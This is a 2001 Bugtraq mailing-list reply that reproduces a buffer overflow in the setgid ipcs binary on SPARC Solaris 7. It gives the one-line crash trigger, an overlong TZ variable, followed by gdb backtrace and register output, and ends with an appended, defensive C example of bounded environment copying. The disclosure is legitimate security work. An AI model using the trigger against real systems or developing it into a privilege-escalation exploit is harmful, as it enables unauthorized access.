[20231] in bugtraq


Re: Solaris ipcs vulnerability

daemon@ATHENA.MIT.EDU (ARAI Yuu)
Mon Apr 16 15:04:47 2001

MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Message-ID:  <20010417005214.0328.Y.ARAI@lac.co.jp>
Date:         Tue, 17 Apr 2001 01:32:03 +0900
Reply-To: ARAI Yuu <y.arai@LAC.CO.JP>
From: ARAI Yuu <y.arai@LAC.CO.JP>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <EIEOJCKGEPCLJHGCNNOPGEBGCKAA.marc@eeye.com>

Hi,

I could reproduce the same buffer overflow on SPARC Solaris 7.
/usr/bin/sparcv7/ipcs is installed as sgid "sys".

---
# TZ=`/usr/local/bin/perl -e 'print "A"x1107'`
# ./ipcs
Segmentation Fault (core dumped)
# /usr/local/bin/gdb ./ipcs core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(no debugging symbols found)...
Core was generated by `./ipcs'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /usr/lib/libkvm.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libelf.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-2/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0  0xff2bd830 in nvmatch () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2bd830 in nvmatch () from /usr/lib/libc.so.1
#1  0xff2bd8dc in getenv () from /usr/lib/libc.so.1
#2  0xff2f6d8c in dcgettext_u () from /usr/lib/libc.so.1
#3  0xff2f6cb0 in gettext () from /usr/lib/libc.so.1
#4  0x112d8 in main ()
#5  0x10e8c in _start ()
Cannot access memory at address 0x41414179.
(gdb) info registers
g0             0x0      0
g1             0xff3107b0       -13563984
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0xff321ccc       -13493044
o1             0xbef9a7 12515751
o2             0xff331f98       -13426792
o3             0xff31f296       -13503850
o4             0xff331f98       -13426792
o5             0xff2bd8a8       -13903704
sp             0xffbee758       -4266152
o7             0xff2bd8d4       -13903660
l0             0xff3a0148       -12975800
l1             0x45658  284248
l2             0xff286940       -14128832
l3             0xff2f6c80       -13669248
l4             0x0      0
l5             0x0      0
l6             0x0      0
l7             0x0      0
i0             0xff321ccc       -13493044
i1             0x223b4  140212
i2             0xff331f98       -13426792
i3             0x0      0
i4             0xffbef8b4       -4261708
i5             0xf      15
fp             0xffbee7b8       -4266056
i7             0xff2f6d84       -13668988
y              0x0      0
psr            0xfe000000       -33554432       icc:----, pil:0, s:0, ps:0, et:0
, cwp:0
wim            0x0      0
tbr            0x0      0
pc             0xff2bd830       -13903824
npc            0xff2bd834       -13903820
fpsr           0x0      0       rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, a
exc:0, cexc:0
cpsr           0x0      0
---

It seems that the "core" installation of Solaris 7 will not install
/usr/bin/sparcv7/ipcs.

Regards,
-----------------------------------------------
ARAI Yuu <y.arai@lac.co.jp>
Security Engineer / LAC Computer Security Laboratory
http://www.lac.co.jp/security/
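Added illustration, not part of the post above and not ipcs source: the crash shape reported (a long TZ value, fault inside getenv's nvmatch while walking a corrupted environment) is the classic signature of an environment string copied into a fixed-size stack buffer in a set-id program. The buffer size and the copy itself are assumptions; the page only shows that a 1107-byte TZ crashes the sgid binary.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size, chosen so that the 1107-byte TZ from the report
 * does not fit. The real ipcs binary's layout is not known from the page. */
#define TZ_BUF_SIZE 1024

/* Return 1 if value (plus its NUL) fits in a buffer of cap bytes, else 0.
 * strnlen() stops scanning at cap, so an oversized value is rejected
 * without walking an arbitrarily long string. */
int env_value_fits(const char *value, size_t cap)
{
    if (value == NULL || cap == 0)
        return 0;
    return strnlen(value, cap) < cap;
}

/* Copy value into dst (cap bytes). Returns 0 on success, -1 on NULL input
 * or when the value does not fit. Rejecting is safer than silently
 * truncating: a truncated zone string is a different, possibly valid-
 * looking, TZ value. Contrast with an unchecked strcpy(dst, getenv("TZ")),
 * which is the defect class the core dump above points to. */
int tz_copy_bounded(char *dst, size_t cap, const char *value)
{
    if (!env_value_fits(value, cap))
        return -1;
    memcpy(dst, value, strlen(value) + 1);
    return 0;
}

/* Load TZ from the environment into dst, falling back to "UTC" when TZ is
 * unset or oversized, so a set-id program never trusts the length of an
 * environment string it did not set itself.
 * Returns 1 if the environment value was used, 0 if the fallback was. */
int tz_load_checked(char *dst, size_t cap)
{
    const char *tz = getenv("TZ");
    if (tz != NULL && tz_copy_bounded(dst, cap, tz) == 0)
        return 1;
    if (cap >= sizeof "UTC")
        memcpy(dst, "UTC", sizeof "UTC");
    else if (cap > 0)
        dst[0] = '\0';
    return 0;
}
```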
